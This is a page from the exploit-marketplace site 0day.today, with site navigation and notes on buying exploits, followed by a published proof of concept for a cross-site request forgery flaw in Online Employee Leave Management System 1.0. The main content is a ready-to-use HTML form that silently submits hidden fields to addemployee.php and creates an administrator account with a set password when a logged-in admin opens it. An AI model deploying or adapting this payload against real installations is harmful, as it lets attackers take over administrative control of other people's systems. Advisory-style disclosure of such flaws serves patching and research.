0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Online Employee Leave Management System 1.0 Cross Site Request Forgery Vulnerability
[# Exploit Title: Online Employee Leave Management System 1.0 - Cross-Site Request Forgery (addemployee.php) # Exploit Author: Amolo Hunters # Software Link: https://www.sourcecodester.com/php/15374/online-employee-leave-management-system-php-free-source-code.html # Version: 1.0 # Tested on: Linux Title: ================ Online Employee Leave Management System 1.0 - Cross-Site Request Forgery (addemployee.php) Summary: ================ The Online Employee Leave Management System suffers from a vulnerability called Cross-Site Request Forgery that affects the addemployee.php application used to add employees with administrative privileges. By failing to block against this attack, malicious users can take advantage of this weakness to spoof a request leading to the creation of a new account with administrative privileges. Severity Level: ================ 5.4 (Medium) CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N Affected Product: ================ Online Employee Leave Management System v1.0 Steps to Reproduce: ================ 1. Create an HTML file and paste the following code: <html> <title>Online Employee Leave Management System (addemployee.php) CSRF PoC</title> <center> <h1>Online Employee Leave Management System (addemployee.php) CSRF PoC</h1> <p>by Amolo Hunters</p> <form action="http://target.com/elms/admin/addemployee.php" method="POST"> <input type="hidden" name="empcode" value="1337" /> <input type="hidden" name="firstName" value="AmoloHT" /> <input type="hidden" name="lastName" value="PoC" /> <input type="hidden" name="email" value="amoloht@poc.com" /> <input type="hidden" name="password" value="hacker123" /> <input type="hidden" name="confirmpassword" value="hacker123" /> <input type="hidden" name="gender" value="Other" /> <input type="hidden" name="dob" value="3 June, 2022" /> <input type="hidden" name="department" value="Information Technology" /> <input type="hidden" name="country" value="Brazil" /> <input type="hidden" name="city" value="PoC" /> <input type="hidden" name="address" value="PoC" /> <input type="hidden" name="mobileno" value="0000000000" /> <input type="hidden" name="add" value="" /> <input type="submit" value="Submit request" /> </form> </center> </html> 2. Save the file and run it in the browser Note: you need to be logged in as an administrator # 0day.today [2024-09-20] #